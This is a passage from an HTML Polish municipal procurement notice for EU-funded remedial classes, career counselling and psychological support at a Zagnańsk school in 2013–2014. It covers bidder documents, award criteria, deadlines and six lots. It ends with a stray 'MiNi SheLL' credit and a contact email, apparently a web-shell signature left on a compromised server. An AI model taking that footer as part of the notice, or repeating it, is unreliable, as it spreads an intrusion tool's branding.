<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje wprowadzenie istotnych zmian w umowie w stosunku do treści oferty na podstawie której, dokona się wyboru wykonawcy w zakresie:
1) przesunięcia terminu realizacji zajęć między latami przewidzianymi na ich wykonanie jeśli stanie się to konieczne z przyczyn niezależnych od stron umowy (np. choroba wykonawcy, brak możliwości prowadzenia zajęć w danym obiekcie, zalecenia Instytucji Pośredniczącej II stopnia);
2) w przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa 
w zakresie mającym wpływ na realizację umowy.
3) W sprawach nieuregulowanych w Specyfikacji Istotnych Warunków Zamówienia
 zastosowanie mają przepisy kodeksu cywilnego jeśli przepisy ustawy z dnia z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. Nr 113, poz. 759 z 2010r. ze zmianami) i przepisy wykonawcze do tej ustawy nie stanowią inaczej.
3. Zamawiający dopuszcza także możliwość zmian umowy w następujących przypadkach:
 - wystąpienie zdarzeń losowych;
 - wystąpienie zmian, których konieczność wprowadzenia będzie wynikała z wymagań instytucji współfinansujących realizację przedmiotu umowy 
- wystąpienie zdarzeń zakłócających prawidłową realizację zadania, zgodną z wymogami instytucji współfinansujących realizację przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zagnansk.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Zagnańsku, ul. Spacerowa 8 26-050 Zagnańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2013 godzina 10:00, miejsce: Urząd Gminy w Zagnańsku, ul. Spacerowa 8 26-050 Zagnańsk
Punkt Obsługi Interesanta na parterze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt finansowany jest w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zespół Szkoły Podstawowej nr 2 i Gimnazjum im. St. Staszica w Zagnańsku, ul. Turystyczna 59, 26-050 Zagnańsk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia wyrównawcze z języka polskiego dla dzieci, które mają trudności z opanowaniem materiału przewidzianego w podstawie programowej - 24 osoby/3 grupy: 8 uczniów;
Łączna liczba godzin lekcyjnych: 90 w tym:
30 h - w okresie wrzesień 2013 r. - grudzień 2013 r.
60 h - w okresie styczeń 2014r. - czerwiec 2014 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zespół Szkoły Podstawowej nr 2 i Gimnazjum im. St. Staszica w Zagnańsku, ul.  Turystyczna 59, 26-050 Zagnańsk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia wyrównawcze z języka angielskiego dla dzieci, które mają trudności z opanowaniem materiału przewidzianego w podstawie programowej - 24 osoby/3 grupy: 8 uczniów;
Łączna liczba godzin lekcyjnych: 90 w tym:
30 h - w okresie wrzesień 2013 r. - grudzień 2013 r.
60 h - w okresie styczeń 2014r. - czerwiec 2014 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zespół Szkoły Podstawowej nr 2 i Gimnazjum im. St. Staszica w Zagnańsku, ul.  Turystyczna 59, 26-050 Zagnańsk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia wyrównawcze z matematyki dla dzieci, które mają trudności z opanowaniem materiału przewidzianego w podstawie programowej - 24 osoby/3 grupy: 8 uczniów;
Łączna liczba godzin lekcyjnych: 90 w tym:
30 h - w okresie wrzesień 2013 r. - grudzień 2013 r.
60 h - w okresie styczeń 2014r. - czerwiec 2014 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zespół Szkoły Podstawowej nr 2 i Gimnazjum im. St. Staszica w Zagnańsku, ul.  Turystyczna 59, 26-050 Zagnańsk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolny Ośrodek Kariery - zajęcia w ramach Szkolnego Ośrodka Kariery kierowane są do uczniów osiągających słabe wyniki z przedmiotów egzaminacyjnych (język polski, język angielski i matematyka) - 26 osób to minimalna liczba uczniów, którzy opracują indywidualne plany kariery zawodowej lub karty mocnych i słabych stron w ramach SzOK (16 osób opracuje indywidualne plany kariery zawodowej a 10 osób karty mocnych i słabych stron).
Łączna liczba godzin: 36 w tym:
10 h - w okresie wrzesień 2013 r. - grudzień 2013 r.
26 h - w okresie styczeń 2014r. - czerwiec 2014 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Szkoła Podstawowa nr 2 i Gimnazjum im. St. Staszica w Zagnańsku, 
ul. Turystyczna 59, 26-050 Zagnańsk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wsparcie psychologa - zajęcia kierowane są do uczniów osiągających słabe wyniki z przedmiotów egzaminacyjnych (język polski, język angielski i matematyka) - wsparciem objęci są wszyscy uczestnicy projektu (ok. 70 osób)
Łączna liczba godzin: 54 (w tym 18 godz. prelekcji) w tym:
12 h - w okresie wrzesień 2013 r. - grudzień 2013 r.
42 h - w okresie styczeń 2014r. - czerwiec 2014 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Szkoła Podstawowa nr 2 i Gimnazjum im. St. Staszica w Zagnańsku, 
ul.  Turystyczna 59, 26-050 Zagnańsk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs technik efektywnego uczenia się - zajęcia kierowane są do uczniów osiągających słabe wyniki z przedmiotów egzaminacyjnych (język polski, język angielski i matematyka) - 
20 osób/2 grupy:10 osób
Łączna liczba godzin lekcyjnych: 60 w tym:
10 h - w okresie wrzesień 2013 r. - grudzień 2013 r.
50 h - w okresie styczeń 2014r. - czerwiec 2014 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com